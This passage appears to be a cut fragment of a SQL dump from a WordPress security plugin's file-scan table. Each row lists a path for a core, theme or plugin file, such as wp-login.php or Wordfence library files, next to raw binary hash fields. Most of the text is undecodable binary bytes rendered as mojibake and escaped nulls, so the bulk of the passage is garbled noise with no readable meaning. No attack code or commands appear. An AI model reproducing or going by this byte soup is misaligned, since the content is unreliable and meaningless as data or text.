\n�)�Ap�k��b�','',0,'?'),('ڰXϨ]I�s�_Z�}��','wp-content/themes/twentytwenty/assets/js/color-calculations.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�0�^�t��}S�','̠U���e�Cb�`aމb���z/ȓ�U','',0,'?'),('�Š�#6�K%#f\r�','wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���H0�c;`���W&','2A]�ڛ\\e��WߦkZ�s���c�<�`�d)�','',0,'?'),('���ݨ�F��P�3�k�','wp-content/themes/catch-flames/inc/panel/theme-options.php',0,'�P<�Lm5�N�{F9-�','�P<�Lm5�N�{F9-�','Ϟ�05��IT�IH�G���ԍ���1j*���','',0,'?'),('��W�S�:�(�=c��','wp-content/themes/twentynineteen/fonts/NonBreakingSpaceOverride.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gߔ��A���B�\\�','�`GS\"Ŝ(G�u\Z	�s�E����P|��','',0,'?'),('�܌�8{\']�f��bz','wp-content/themes/hitmag/inc/kirki/includes/styles/class-kirki-styles-customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�]F�ș�ێ����','��J�3l`��y���\Z��ր��\0�=$`(!���}','',0,'?'),('���P��dLڒ���','wp-content/themes/enigma/core/admin/enigma-banner.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9lAh�w=c�pc�','��D�9��%)쳞��{�\'G�Xi⿐','',0,'?'),('��lo�.!q?�_w','wp-content/themes/newsmag/assets/sass/modules/_clearings.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Yz�QO��6�','z8�{�� Ph�#W�T(�$.�8�r�����','',0,'?'),('�鳟�:yc�\nE� V�','wp-content/themes/advance/inc/kirki/assets/js/branding.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nj@��>�ئ�r�/��','�\06z=�a����\\��(���GmTꥪ7SQ','',0,'?'),('��J�B�&9:V�F[�','wp-includes/js/dist/media-utils.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3)PvLiJO�|��','�c��BD����ҕ���2+��k�`1<��*�w�˕','',0,'?'),('��Q�ҩ��1�W��e�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/functions/set-setting-value.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}G��o�_��$N#��','��N��z��F�XQ��٭��&�u�b@��/','',0,'?'),('���C�.yj\0o�*�f�','wp-content/plugins/wordfence/views/scanner/option-scan-signatures.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S��o��JP�','�ǣ.�ڑ���m���Uǝ��az��l-pv','',0,'?'),('�����:G��w�_�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/fold/foldgutter.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�����}�8�','�h�7��*GN0��T�0�N7��ŰCQtPJ','',0,'?'),('�!�(t��<Թ','wp-includes/js/heartbeat.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r���>������q����','��~�8��|\nvS̃M_ZD�&���K��-\Zې�','',0,'?'),('��_\r�JL�#�@B��','wp-admin/css/colors/midnight/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k��|��\'\rȤ�@�\n','B��x.e��DP�0�����$\Z�D3��','',0,'?'),('�ƪ�D��|��\"�3��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('� �I�_X�����?','wp-admin/js/gallery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z%�[�l�]ʕ����','���I�^�K��_�i��Gz��:5��n|�ߡL','',0,'?'),('�\"p�Z�A���	tl�','wp-content/themes/wp-simple/assets/js/respond.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W�z` w�2�fPH��','��1���J�u�{Y[���!6QFh�84^�w�','',0,'?'),('�4��6�1�m��Y�R','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nH\0�u�}� `����','���R�&�X��d�[��4���9��V�I','',0,'?'),('�<���\0vY�>ma','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-chat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3�=4�+��2]','i\Z%�2���l���@uFi��=��_\0P�հ�','',0,'?'),('�L��X��z�v','wp-content/themes/university-hub/third-party/sidr/js/jquery.sidr.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7���� ԏBN��A�','��8���ʥ��CHJZ��\\uZ@v�_SU��','',0,'?'),('�_nbS��/��䈿','wp-content/themes/wp-simple/inc/kirki/kirki/assets/images/kirki-bottom.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����v�}��^��','�%\Z�\"S��/k��������������Q�','',0,'?'),('�`����b}�(�w�Z','wp-content/themes/enigma/css/customizr.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?6s������ut��','�\"\r�Z���p�T��T���a�,�O�ؑ|b�','',0,'?'),('�e\"V�T�1��z��o��','wp-content/themes/gambit/css/genericons/Genericons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;(H��-Jht�x�','��;�m��}������e(~�y0m�=�},','',0,'?'),('�v6^A��A/],6\'y:','wp-admin/css/site-health.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~��{�x�y6roc�','ɬ�v��O�܋)%���\0���|М���O�','',0,'?'),('ۋ{S0\0\0=�1_ئ\r�5','wp-includes/js/dist/priority-queue.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�9(�����&!�x�','5�r�Q���b�͔5�t����>:js-O','',0,'?'),('ۖJ�Bw�C��|M�v','wp-content/plugins/wordfence/lib/Diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5VzY�]�#yR��Jݮ','Y�M�\"z)tϖ���*c�wL\0�����1w$d��','',0,'?'),('ۚ\"UB�/9���A�A�','wp-content/themes/chronus/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j+8	b/>��CV��','0�[K[���58�����H��`�l`','',0,'?'),('۪��	.�ո�\\���','wp-includes/js/tinymce/skins/wordpress/wp-content.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����`��Un\0\r��','>���@�:so���X�=��Kd��ku�{�','',0,'?'),('۬�hl��;a!��q��8','wp-content/themes/university-hub/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2���J��z���Sc%','���4F�qM\r�D����6[����\0z�x�\0!q','',0,'?'),('�`X�~FڲC���K','wp-content/themes/exoplanet/images/exoplanet-header.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w,F1��裮���','n��c��������Kˏ��K�\0E]@\n�+��(>','',0,'?'),('���/8�լ�\nU���W','wp-content/themes/city-store/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ߦ�p�]K9c�8tyv','@b)<fo�xA\0��ap\n�g<8,�ߖ�','',0,'?'),('��r�����؁=�Ԓ�','wp-includes/images/rss.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[�(�.��*NZ�','j�(-9��_��E-#�we�$�]o�01��u','',0,'?'),('�Ȟ3�d%�49�2ݪ','wp-content/themes/auberge/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','몽,�,e)a�-��W','G�M�P�4\0W�e��]v{�u\\��ʺ','',0,'?'),('��#q�\\�g�����','wp-content/themes/hitmag/inc/kirki/assets/js/postmessage.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a��Se��e篃','���I�0���(\'{���I5o����0[\\x','',0,'?'),('�ٷ<r���л��3','wp-content/themes/catch-responsive/sidebar-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p<m�*���ceV@�h','#k�0��}ՂJ�,6uTHa��if�H�0�(/��d','',0,'?'),('�ڨ�t�c	�˵�:G�','wp-content/themes/twentytwenty/template-parts/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y.��|�	�zo~��','�m`C/\r���~�����/#b\ZM͆��]�؍i','',0,'?'),('��\np���Gnu:���','wp-includes/js/colorpicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V g�����-�','�V�w��%�%�:�3CQ#+g��	��e�}�','',0,'?'),('��O�@8L�o{��#^','wp-content/themes/chronus/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ӻ�VUP�[��m\0]6�','���>[NǠշ:]���`��M࿩���6�T','',0,'?'),('��v��q_���PUC�','wp-content/themes/brickyard/js/menubox.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�0\"�\"��GN��oF','����0��]1\r{���~HW�2�as+','',0,'?'),('��:�ҝ\Zdm���*v','wp-content/plugins/wp-cerber/assets/flags/ie.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�Ht�`��Mˉ.2*','��H�X�� �\Z�۴�n��\0y��n��n','',0,'?'),('�F���\ru�D�b7','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m�E���}8ןb�,','dh��nC���[�$���P7�xH\"8�i\Z*�','',0,'?'),('�ȼ�؟�\'\r`����','wp-includes/feed-rdf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xG�7�%���\0b���','p=m=G�l�h�nh��V��]�-�+�1�a','',0,'?'),('���O\nư�n ��','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/controls/palette.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',v&ne��._C>�H','�6F�[�شU�l���D���\0�\r5nRaMH','',0,'?'),('�(�{ϻ�-V��Җ�','wp-content/themes/wp-simple/inc/kirki/kirki/includes/controls/class-kirki-controls-color-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̭,�\r��2����&�','n��J\Z,8��Y8{\0R��f��m�~���QɹZ','',0,'?'),('�.���C-�`7�H�','wp-content/themes/wp-simple/inc/kirki/includes/output/field/class-kirki-output-field-multicolor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',q=��`�qG��Ig',' ��TW��&D2eeJ!����bq�\"�w�*�ߔ>�','',0,'?'),('�2G�?�_�\\��-B','wp-includes/canonical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G��o<����ݏ�','����1\r�eɓ�������Y宒^zՒ=�F�1','',0,'?'),('�4�Gϧ�#p�W�R�L�','wp-content/themes/hemingway/widgets/video-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^F��![�%kn6��','�Tҏu��H‰5�^2�J3�\Z��:�TB','',0,'?'),('�7�40���!Go �','wp-content/themes/twentynineteen/sass/elements/_elements.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S��u����$x\0oT�','�\n�ơ�J��xY#$m>�ۍյ?�U\"$��lz','',0,'?'),('�8�nk���K�.|_W','wp-content/themes/gildrest/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�뒳��1<j3����','��v��}�N�f��J��I~@Ad\ZH+2�/P����','',0,'?'),('�<� ӓk�H�(3��','wp-content/themes/graduate/assets/plugins/css/slick.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2��&�q�V���','U3��xl���\r�QM()�q�֋����M`_','',0,'?'),('�A^I����}�Wz�P7','wp-content/themes/enigma/core/lang/enigma-2.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�$��.�(V��B','���_6����J��CP�^X2��J��2L��9�L','',0,'?'),('�M\\-D�kf����','wp-content/plugins/wp-cerber/assets/flags/kw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�p8V��$vL\r�Y]�','&�\\m0���Iz{<�>��|���\'����L','',0,'?'),('�RRU���E�5��l�','wp-content/themes/hitmag/inc/kirki/includes/controls/class-kirki-controls-preset-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>GF2n�6�l`�;Q�\'�',';I�{cj�Q!�B�ٸ�;�?4E0�����}ּ)','',0,'?'),('�TTf��;�*vj','wp-content/themes/Yegor/content.php',0,'�D2\'섗D\"pKl�.G','�D2\'섗D\"pKl�.G','J�9,ᝋp�$�B�D���h�p���z�> �','',0,'?'),('�Y�P���?=E�dY�','wp-content/themes/event/assets/sticky/jquery.sticky.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r�37�\r=�����n','L��\n��Ne�d\rO��)���q�M�\r�wX�','',0,'?'),('�](�}��a#���','wp-content/themes/skt-pathway/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r.�7�/�3\'�O��','䔍�&��^��JdLR��bu]������m��8','',0,'?'),('�]��`���J�$tAM�','wp-content/themes/newsmag/assets/sass/elements/_tables.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k	��<-��U©,��','��}+-!xћUi��(\'�����i)�+�(�	k�','',0,'?'),('�cFԗ���Y�k%��','wp-content/themes/city-store/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','؆Ъ��>��*��3E�','V�C9���p�d����f���o�h}1�}�Xna','',0,'?'),('�f���&nv�&��o�I','wp-content/themes/catch-responsive/archive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J\\�MW�\'�f��,�','���g���^n��YŠ����T��8k�`^=','',0,'?'),('�j~ʰ��v�vj�K1�','wp-content/themes/newsmag/inc/widgets/posts_grid/class-widget-newsmag-posts_grid.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H0��+�9�\0��o�','.��*�wŘ�e�𡞝��+��}��K*�G�','',0,'?'),('ܑK�ݓ���%eP�^U','wp-content/plugins/wordfence/views/scanner/issue-checkGSB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T&����#i�]�<{','EPmh>*H�S��8�S�F��pXbdU8����','',0,'?'),('ܑ�6�v�6�G	!','wp-content/themes/singularity/template-parts/content-home.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C�)]E:��0yx�+','A�pw���}���9��z�e��Lg�ɖ��','',0,'?'),('ܙCY�(+�Y��9','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/addon/merge/merge.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��x��LE�U���','qv�OL�щ:�\\!�BM`��c\n��8W�J�S','',0,'?'),('ܡt-��z�O�ț�n�;','wp-content/themes/hemingway/image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��M�iO��R��X�','�1��@�gC\"���\' ����s��]��/�٠%s','',0,'?'),('ܷ徃� ���@+x','wp-content/themes/newsmag/assets/sass/site/secondary/_widget-recent-posts.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p�棌�zIm��v','� \Z>\"��p�WCj�U8\"�2��da������^','',0,'?'),('ܸ/�Wf]�ͣ~UL	','wp-content/themes/graduate/assets/plugins/js/unminified/wow.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.(�\rIe~\Z	d�W��','��Db�aG��=X�\0ȚZ�ݤ(��`p�ᤎum','',0,'?'),('ܼK���w;��W޶','wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']g���ȼy3҉s\r���','�uL��(n��Z]�\Z��3�Q֚�I\"�a�','',0,'?'),('���.�U�	��Y��=','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/byte_safe_strings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h���`����V�Af','<�\\�G��;1#��k�L��à��(փ','',0,'?'),('��Tо�R���\'�{','wp-content/plugins/wordfence/lib/wfPersistenceController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%��ky���i�MO*','����X(�30\r\n��\nPE�̠�� �9��','',0,'?'),('��\"|Y�����','wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/number.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ϟ�C���U�{�','*Cz��I�;�R*��$��wE�pv���Qp�','',0,'?'),('��ջZml��4�ˮU','wp-includes/images/smilies/simple-smile.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��{…��f�w�h','�?Y�ag\\�<y����0\01��8�3��H�g','',0,'?'),('��@�*7�#�?R�`�i�','wp-content/themes/simpleshift/lang/simpleshift.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����R����0','lQ��`q�ѱS����K<����J�������','',0,'?'),('��\r\0FJ��B��e�','wp-login.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Q�����G1��','[�d�뿪�a��o�Ϸ�8|[��U׎��u�(','',0,'?'),('�׵(���K�B��','wp-includes/js/codemirror/fakejshint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�v�,ROlx]J\')K','��-�6�$$�;���}ptO�4]2��ТR�5֡','',0,'?'),('��Ԭg#��٠���','wp-content/themes/twentytwentyone/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n��6Z��.�C�A','��-c����W��o��6\n����(','',0,'?'),('�11f@m�r(���žE','wp-content/themes/newsmag/assets/sass/modules/_alignments.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�X���`\r\0M%t�','f���+*�>�-�,���(�Ă�\\���z','',0,'?'),('�7�׭B�J���~}\0','wp-content/themes/advance/content-none.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��aC���h�lC\0r�','�ꠤ�D>i����<OTb�ӭ��#�C)i�S�','',0,'?'),('�J0���j�Yg�h�','wp-includes/js/tinymce/plugins/lists/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�8��:s��w�9�J��',')b�#4�e��*�9(��=�QE�e0|1���\n�','',0,'?'),('�Ok Ʈ��&��5}�A','wp-content/themes/university-hub/inc/customizer/partials.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x{m���2���u��7','|�\"6b=�eV;��E��A��Ӌ|���','',0,'?'),('�Q�R�\r\'g�#r1��','wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-values.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F}X��~e��9#���','P_=&߁���X�Z�ۉ���D��3�i���KM%','',0,'?'),('�S�9�|ΈQ��EQ�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/javascript/typescript.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ijoi|,zT�s�H�','�����f�/�EB�]#_3툶�sN�7z�\r��','',0,'?'),('�[6�5��+�	�n9�','wp-admin/images/sort.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������*� ����3','vP���-~�x��O\"	�����;��','',0,'?'),('�e��v.EZ�M��%�','wp-content/themes/catch-responsive/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��.��G��C�(�','��_O��Xbp��4�D��vO���,��Z�S','',0,'?'),('�f��y���ħ�*!','wp-admin/js/nav-menu.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B�)=�\'d�G�','d6��H�W�F�8!�y�NA���2��\'`@�','',0,'?'),('�f��=�$�c��<��','wp-content/themes/advance/inc/customizer/config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�K{8���x���/�:�','C~�H�(k���؆E��a�JU���-�J)�','',0,'?'),('�xm7�圓N$��','wp-content/themes/saybusiness/css/theme-manager.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9��po�ĆOuK���','��I�����ئ���ٲ킬�y�[�RU�','',0,'?'),('�}���ʖn�̵~','wp-content/themes/advance/js/upsell.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*ȴ\"�-�RL�?E','���Q�¬�g�!h�9Aw��pQa����Y','',0,'?'),('��vaL�U�{JCp<','wp-content/themes/catch-responsive/inc/customizer-includes/upgrade-button/section-pro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\rs��KOݡ���]H','�ʹ��<� �5]v�����-)Q������I��','',0,'?'),('ݖ�\'�\"|3�_�t|��','wp-includes/class-wp-term.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q5��ׄXZ��','�}Gj)p�����O�7�٠fݒ���ፎ�Y�p','',0,'?'),('ݥ�����S�Af�Q��','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/htmlmixed/htmlmixed.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��P�P�Sd�H�e�a�','�S�b�̴��O�5��<��$��(���s�� ��','',0,'?'),('ݦ����{b�h0�Q�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6ߔu�UŽ�Q(�AF�','̩\ZTQb[c�U�,��s~��$�F_\n�e�	�','',0,'?'),('ݶoh}�D:�$���U�','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/addon/display/fullscreen.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S���sݘ\Z�4Ѫ�','\'Y��t�\0�{T�bsMo�ј��|����','',0,'?'),('ݻZ\'�O��OZ�h�','wp-content/themes/catch-flames/images/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�v!�K>��t���z+','c�����G�Xrf&��ۂ��j���0�-EpE','',0,'?'),('ݾF��k�b��O���','wp-content/themes/simpleshift/parts/single_post_nav.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R��V��]�z��{��','��Q����Ҵ�`?�>��]r/?;�T	t','',0,'?'),('�€����\Z4=#��','wp-content/themes/twentytwentyone/.stylelintignore',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':F��Q��K/���(�','�\"����$ْ��Mh�m��6�:W�C�tN��`�','',0,'?'),('��xV��_���!�','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/lint/yaml-lint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�$�,=g���','��35�:�!���7u�6@1�*���\ZyN8�0*','',0,'?'),('��:�iZ�إ��(�V','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/javascript/test.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ٺĠ`58��%�#','�LZV�2H:,%�F�8����\0��2�K�h�o��','',0,'?'),('���1��JRw��ċ�','wp-content/themes/Kent/FT/plugin/updater.php',0,'uc3\\����[\'�N�9�','uc3\\����[\'�N�9�','Q�s�=\\Eؐ�@���\0EF�r�^Do���\\','',0,'?'),('����㮓\n��)\'r�','wp-content/themes/wp-simple/inc/kirki/assets/js/controls/color-alpha.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����-\n�X_�co\r','�򂷩W�D@�*;�%�hzqS:ެ`�s','',0,'?'),('��\'��|?��>��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���L��aDJ�?��Z��','����=F=�=�<��_%�=��M?�����u/','',0,'?'),('�OKN�\0�Yn\"��a','wp-content/plugins/akismet/views/connect-jp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s��Q�X���3��','�\0.l>Wv&�������q�v�+��I�N~�W','',0,'?'),('�HC������)�C�','wp-content/plugins/wordfence/lib/rest-api/wfRESTBaseController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y��K��\n�u�@�x','Aݶ�݁;_|s�Ȥ4��_�)z�aK�Q�Ee!��','',0,'?'),('��u�m�mL�jsL/�','wp-content/plugins/wp-cerber/cerber-ripe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�a���G�5.L��','�BA�i���B�\rD�y.��_�Ώ%)�X�h�\Z�','',0,'?'),('�p�խ^�@#�Ԓ','wp-content/plugins/wordfence/views/scanner/scan-progress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�1{�	@�m�90','�K��M$���)�+SCQF�1qZ�Tv`�r','',0,'?'),('�/�p��I�RL�Nh!','wp-content/themes/enigma/images/Enig.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 1Uf&ec\'b8�9�;�','��*�M�lې\\�#v\'����Y�>F�ս��F�','',0,'?'),('�3^��PM�Y���H�D�','wp-includes/js/tinymce/skins/wordpress/images/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�¶��B�=\rz��3j�','���i���I/=�M�MX�:M�A�pv�\r�','',0,'?'),('�5f�����oޮ�','wp-admin/includes/class-wp-privacy-policy-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ã��6�rRӆ��',':����֎�,J-1�3��B\ZU.��g','',0,'?'),('�N�\\�|�`*�,)@4','wp-includes/images/xit-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӂ�u:@4\r���z<5�','�S\r�}@�~Q�:�Sc����*d+�Z�_�{�R','',0,'?'),('�a�c]OVT�;� (K','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-blacklist-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nb�[�c�^��2}/��','��g\r�^� �j��L��v2���\Z���x�t','',0,'?'),('�d-EV��_Wٝ-Y�','wp-content/themes/skt-pathway/css/computer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qy|�\"�{T��@\r�s�','�Y\n�.��[\\	}@ث���5r\08��:���\'','',0,'?'),('�e�5\'��qR=vsȒ','wp-content/themes/graduate/tp-education/tp-single-testimonial.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڵ͸�n��u^q-�d','�T�s������b��j\0m��{B��g��t��','',0,'?'),('�~�����У���Y��','wp-content/themes/exoplanet/functions/js/upload-media.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�.ҽ�_��	�F','�C$��k�.L�gqE,X��=��.1���\"','',0,'?'),('ޒ�?I�Ωi%��g�y�','wp-content/plugins/wordfence/lib/menu_dashboard_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�h<x�Ο�=9��','�����Q�zE���\'?H)ky��a\Z�>Bч�','',0,'?'),('ޖ��rK���p�+','wp-content/themes/hemingway/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Mvxc���_C�@9�','�Hs[l�q �5\r(�@��/�<8�mu���','',0,'?'),('ޘ��i(�i>���0�','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/fold/xml-fold.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s��̵��_7����C�','S��d\r��x�i�Q]\\��mG-\\�ޘ�:�','',0,'?'),('ޞ�P�Funlp��6�','wp-content/themes/metro-magazine/inc/customizer/color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0��w��R�\\ը�','t��|���k�H2��d\"�����0��#bDž\'','',0,'?'),('ޠ�OČÑL:\0و�','wp-content/themes/twentytwenty/assets/images/2020-three-quarters-4.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӂ��\"�E47ŎE�','�����yaĊ��2ݦ�wʩ��q�,���{','',0,'?'),('ޮ�.����\"1A+���','wp-content/themes/city-store/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�icz9F��j�@(���','��d�4��������욖�2�P��$̤�','',0,'?'),('���h�3��\"L�L��.','wp-content/themes/advance/images/rps_arrows.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�4ܻ;��#\0�Ѥ�','bۿb�h������d~��x<T�|�q�T{���','',0,'?'),('�ދ���1F���a�','wp-content/plugins/wordfence/lib/wfArray.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'Fbaۆ�ₑ�1ʤ/','��n2q��8D��-�AR�>�xqYq���$� 